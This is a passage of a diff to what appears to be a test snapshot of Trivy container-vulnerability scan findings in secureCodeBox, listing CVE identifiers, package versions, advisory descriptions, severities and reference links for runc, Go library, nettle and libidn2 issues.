PR #3785 for details. users are advised to upgrade. Users unable to upgrade should avoid using an untrusted container image.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "AppArmor can be bypassed when \`/proc\` inside the container is symlinked with a specific mount configuration", + "references": [ { "type": "URL", - "value": "http://support.apple.com/kb/HT5281", + "value": "https://avd.aquasec.com/nvd/cve-2023-28642", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT5501", + "value": "https://access.redhat.com/security/cve/CVE-2023-28642", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT6150", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28642", }, { "type": "URL", - "value": "http://technet.microsoft.com/security/advisory/2588513", + "value": "https://github.com/advisories/GHSA-g2j6-57v7-gm8c", }, { "type": "URL", - "value": "http://vnhacker.blogspot.com/2011/09/beast.html", + "value": "https://github.com/opencontainers/runc/pull/3785", }, { "type": "URL", - "value": "http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf", + "value": "https://github.com/opencontainers/runc/security/advisories/GHSA-g2j6-57v7-gm8c", }, { "type": "URL", - "value": "http://www.debian.org/security/2012/dsa-2398", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-28642", }, { "type": "URL", - "value": "http://www.educatedguesswork.org/2011/09/security_impact_of_the_rizzodu.html", + "value": "https://ubuntu.com/security/notices/USN-6088-1", }, { "type": "URL", - "value": "http://www.ibm.com/developerworks/java/jdk/alerts/", + "value": "https://ubuntu.com/security/notices/USN-6088-2", }, { "type": "URL", - "value": "http://www.imperialviolet.org/2011/09/23/chromeandbeast.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-28642", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.5", + "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2023-25809", + "installedVersion": "v1.0.1", + "packageName": "github.com/opencontainers/runc", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-25809", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25809", + "https://github.com/advisories/GHSA-m8cg-xc2p-r3fc", + "https://github.com/opencontainers/runc/commit/0d62b950e60f6980b54fe3bafd9a9c608dc1df17", + "https://github.com/opencontainers/runc/commit/0e6b818a2b0d24fdb6697614e5c5f115bbe8e3a5 (v1.1.5)", + "https://github.com/opencontainers/runc/security/advisories/GHSA-m8cg-xc2p-r3fc", + "https://nvd.nist.gov/vuln/detail/CVE-2023-25809", + "https://ubuntu.com/security/notices/USN-6088-1", + "https://ubuntu.com/security/notices/USN-6088-2", + "https://www.cve.org/CVERecord?id=CVE-2023-25809", + ], + }, + "category": "Vulnerability", + "description": "runc is a CLI tool for spawning and running containers according to the OCI specification. In affected versions it was found that rootless runc makes \`/sys/fs/cgroup\` writable in following conditons: 1. when runc is executed inside the user namespace, and the \`config.json\` does not specify the cgroup namespace to be unshared (e.g.., \`(docker|podman|nerdctl) run --cgroupns=host\`, with Rootless Docker/Podman/nerdctl) or 2. when runc is executed outside the user namespace, and \`/sys\` is mounted with \`rbind, ro\` (e.g., \`runc spec --rootless\`; this condition is very rare). A container may gain the write access to user-owned cgroup hierarchy \`/sys/fs/cgroup/user.slice/...\` on the host . Other users's cgroup hierarchies are not affected. Users are advised to upgrade to version 1.1.5. Users unable to upgrade may unshare the cgroup namespace (\`(docker|podman|nerdctl) run --cgroupns=private)\`. This is the default behavior of Docker/Podman/nerdctl on cgroup v2 hosts. or add \`/sys/fs/cgroup\` to \`maskedPaths\`.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "Rootless runc makes \`/sys/fs/cgroup\` writable", + "references": [ { "type": "URL", - "value": "http://www.insecure.cl/Beast-SSL.rar", + "value": "https://avd.aquasec.com/nvd/cve-2023-25809", }, { "type": "URL", - "value": "http://www.kb.cert.org/vuls/id/864643", + "value": "https://access.redhat.com/security/cve/CVE-2023-25809", }, { "type": "URL", - "value": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:058", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25809", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/mac/1151/", + "value": "https://github.com/advisories/GHSA-m8cg-xc2p-r3fc", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/mac/1160/", + "value": "https://github.com/opencontainers/runc/commit/0d62b950e60f6980b54fe3bafd9a9c608dc1df17", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/unix/1151/", + "value": "https://github.com/opencontainers/runc/commit/0e6b818a2b0d24fdb6697614e5c5f115bbe8e3a5 (v1.1.5)", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/unix/1160/", + "value": "https://github.com/opencontainers/runc/security/advisories/GHSA-m8cg-xc2p-r3fc", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/windows/1151/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-25809", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/windows/1160/", + "value": "https://ubuntu.com/security/notices/USN-6088-1", }, { "type": "URL", - "value": "http://www.opera.com/support/kb/view/1004/", + "value": "https://ubuntu.com/security/notices/USN-6088-2", }, { "type": "URL", - "value": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-25809", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "0.0.0-20220412211240-33da011f77ad", + "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-29526", + "installedVersion": "v0.0.0-20210817142637-7d9622a276b7", + "packageName": "golang.org/x/sys", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-29526", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", + "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "https://github.com/golang/go/issues/52313", + "https://go.dev/cl/399539", + "https://go.dev/cl/400074", + "https://go.dev/issue/52313", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "https://linux.oracle.com/cve/CVE-2022-29526.html", + "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "https://pkg.go.dev/vuln/GO-2022-0493", + "https://security.gentoo.org/glsa/202208-02", + "https://security.netapp.com/advisory/ntap-20220729-0001/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-29526", + ], + }, + "category": "Vulnerability", + "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "faccessat checks wrong group", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-29526", }, { "type": "URL", - "value": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-29526", }, { "type": "URL", - "value": "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", }, { "type": "URL", - "value": "http://www.redhat.com/support/errata/RHSA-2011-1384.html", + "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", }, { "type": "URL", - "value": "http://www.redhat.com/support/errata/RHSA-2012-0006.html", + "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/49388", + "value": "https://github.com/golang/go/issues/52313", + }, + { + "type": "URL", + "value": "https://go.dev/cl/399539", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/49778", + "value": "https://go.dev/cl/400074", }, { "type": "URL", - "value": "http://www.securitytracker.com/id/1029190", + "value": "https://go.dev/issue/52313", }, { "type": "URL", - "value": "http://www.securitytracker.com/id?1025997", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "http://www.securitytracker.com/id?1026103", + "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", }, { "type": "URL", - "value": "http://www.securitytracker.com/id?1026704", + "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", }, { "type": "URL", - "value": "http://www.ubuntu.com/usn/USN-1263-1", + "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", }, { "type": "URL", - "value": "http://www.us-cert.gov/cas/techalerts/TA12-010A.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2011-3389", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", }, { "type": "URL", - "value": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_fetchmail", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", }, { "type": "URL", - "value": "https://bugzilla.novell.com/show_bug.cgi?id=719047", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=737506", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-556833.pdf", + "value": "https://pkg.go.dev/vuln/GO-2022-0493", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389", + "value": "https://security.gentoo.org/glsa/202208-02", }, { "type": "URL", - "value": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-006", + "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", }, { "type": "URL", - "value": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03839862", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://hermes.opensuse.org/messages/13154861", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "0.0.0-20220412211240-33da011f77ad", + "foundIn": "Target: 'opt/bitnami/common/bin/wait-for-port' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-29526", + "installedVersion": "v0.0.0-20210510120138-977fb7262007", + "packageName": "golang.org/x/sys", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-29526", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", + "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "https://github.com/golang/go/issues/52313", + "https://go.dev/cl/399539", + "https://go.dev/cl/400074", + "https://go.dev/issue/52313", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "https://linux.oracle.com/cve/CVE-2022-29526.html", + "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "https://pkg.go.dev/vuln/GO-2022-0493", + "https://security.gentoo.org/glsa/202208-02", + "https://security.netapp.com/advisory/ntap-20220729-0001/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-29526", + ], + }, + "category": "Vulnerability", + "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "faccessat checks wrong group", + "references": [ { "type": "URL", - "value": "https://hermes.opensuse.org/messages/13155432", + "value": "https://avd.aquasec.com/nvd/cve-2022-29526", }, { "type": "URL", - "value": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", + "value": "https://access.redhat.com/security/cve/CVE-2022-29526", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2011-3389.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2011-1380.html", + "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2011-3389", + "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", }, { "type": "URL", - "value": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14752", + "value": "https://github.com/golang/go/issues/52313", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-1263-1", + "value": "https://go.dev/cl/399539", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2011-3389", + "value": "https://go.dev/cl/400074", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "3.4.1-1+deb10u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-20305", - "installedVersion": "3.4.1-1", - "packageName": "libhogweed4", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-20305", - "https://bugzilla.redhat.com/show_bug.cgi?id=1942533", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20305", - "https://linux.oracle.com/cve/CVE-2021-20305.html", - "https://linux.oracle.com/errata/ELSA-2021-1206.html", - "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQKWVVMAIDAJ7YAA3VVO32BHLDOH2E63/", - "https://lists.lysator.liu.se/pipermail/nettle-bugs/2021/009457.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-20305", - "https://security.gentoo.org/glsa/202105-31", - "https://security.netapp.com/advisory/ntap-20211022-0002/", - "https://ubuntu.com/security/notices/USN-4906-1", - "https://www.cve.org/CVERecord?id=CVE-2021-20305", - "https://www.debian.org/security/2021/dsa-4933", - ], - }, - "category": "Vulnerability", - "description": "A flaw was found in Nettle in versions before 3.7.2, where several Nettle signature verification functions (GOST DSA, EDDSA & ECDSA) result in the Elliptic Curve Cryptography point (ECC) multiply function being called with out-of-range scalers, possibly resulting in incorrect results. This flaw allows an attacker to force an invalid signature, causing an assertion failure or possible validation. The highest threat to this vulnerability is to confidentiality, integrity, as well as system availability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "nettle: Out of bounds memory access in signature verification", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-20305", + "value": "https://go.dev/issue/52313", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-20305", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1942533", + "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20305", + "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-20305.html", + "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-1206.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQKWVVMAIDAJ7YAA3VVO32BHLDOH2E63/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", }, { "type": "URL", - "value": "https://lists.lysator.liu.se/pipermail/nettle-bugs/2021/009457.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20305", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202105-31", + "value": "https://pkg.go.dev/vuln/GO-2022-0493", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211022-0002/", + "value": "https://security.gentoo.org/glsa/202208-02", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4906-1", + "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-20305", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4933", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "3.4.1-1+deb10u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3580", - "installedVersion": "3.4.1-1", - "packageName": "libhogweed4", + "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", + "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27664", + "installedVersion": "v0.0.0-20220722155237-a158d28d115b", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-3580", - "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", - "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", - "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", - "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", - "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", - "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", - "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", - "https://errata.almalinux.org/8/ALSA-2021-4451.html", - "https://errata.rockylinux.org/RLSA-2021:4451", - "https://linux.oracle.com/cve/CVE-2021-3580.html", - "https://linux.oracle.com/errata/ELSA-2022-9221.html", - "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3580", - "https://security.netapp.com/advisory/ntap-20211104-0006/", - "https://ubuntu.com/security/notices/USN-4990-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3580", + "https://access.redhat.com/errata/RHSA-2023:2357", + "https://access.redhat.com/security/cve/CVE-2022-27664", + "https://bugzilla.redhat.com/2107371", + "https://bugzilla.redhat.com/2107374", + "https://bugzilla.redhat.com/2107383", + "https://bugzilla.redhat.com/2107386", + "https://bugzilla.redhat.com/2107388", + "https://bugzilla.redhat.com/2113814", + "https://bugzilla.redhat.com/2124669", + "https://bugzilla.redhat.com/2132868", + "https://bugzilla.redhat.com/2132872", + "https://bugzilla.redhat.com/2161274", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "https://errata.rockylinux.org/RLSA-2022:7129", + "https://github.com/advisories/GHSA-69cg-p879-7622", + "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "https://github.com/golang/go/issues/54658", + "https://go.dev/cl/428735", + "https://go.dev/issue/54658", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-27664.html", + "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "https://pkg.go.dev/vuln/GO-2022-0969", + "https://security.gentoo.org/glsa/202209-26", + "https://security.netapp.com/advisory/ntap-20220923-0004/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-27664", ], }, "category": "Vulnerability", - "description": "A flaw was found in the way nettle's RSA decryption functions handled specially crafted ciphertext. An attacker could use this flaw to provide a manipulated ciphertext leading to application crash and denial of service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "nettle: Remote crash in RSA decryption via manipulated ciphertext", + "name": "handle server errors after sending GOAWAY", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3580", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3580", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", + "value": "https://avd.aquasec.com/nvd/cve-2022-27664", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", + "value": "https://access.redhat.com/errata/RHSA-2023:2357", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", + "value": "https://access.redhat.com/security/cve/CVE-2022-27664", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", + "value": "https://bugzilla.redhat.com/2107371", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", + "value": "https://bugzilla.redhat.com/2107374", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", + "value": "https://bugzilla.redhat.com/2107383", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", + "value": "https://bugzilla.redhat.com/2107386", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", + "value": "https://bugzilla.redhat.com/2107388", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", + "value": "https://bugzilla.redhat.com/2113814", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", + "value": "https://bugzilla.redhat.com/2124669", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4451.html", + "value": "https://bugzilla.redhat.com/2132868", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4451", + "value": "https://bugzilla.redhat.com/2132872", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3580.html", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9221.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3580", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211104-0006/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4990-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3580", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-12290", - "installedVersion": "2.0.5-1+deb10u1", - "packageName": "libidn2-0", - "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00008.html", - "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00009.html", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12290", - "https://gitlab.com/libidn/libidn2/commit/241e8f486134793cb0f4a5b0e5817a97883401f5", - "https://gitlab.com/libidn/libidn2/commit/614117ef6e4c60e1950d742e3edf0a0ef8d389de", - "https://gitlab.com/libidn/libidn2/merge_requests/71", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UFT76Y7OSGPZV3EBEHD6ISVUM3DLARM/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KXDKYWFV6N2HHVSE67FFDM7G3FEL2ZNE/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ONG3GJRRJO35COPGVJXXSZLU4J5Y42AT/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RSI4TI2JTQWQ3YEUX5X36GTVGKO4QKZ5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U6ZXL2RDNQRAHCMKWPOMJFKYJ344X4HL/", - "https://security.gentoo.org/glsa/202003-63", - "https://ubuntu.com/security/notices/USN-4168-1", - "https://usn.ubuntu.com/4168-1/", - ], - }, - "category": "Vulnerability", - "description": "GNU libidn2 before 2.2.0 fails to perform the roundtrip checks specified in RFC3490 Section 4.2 when converting A-labels to U-labels. This makes it possible in some circumstances for one domain to impersonate another. By creating a malicious domain that matches a target domain except for the inclusion of certain punycoded Unicode characters (that would be discarded when converted first to a Unicode label and then back to an ASCII label), 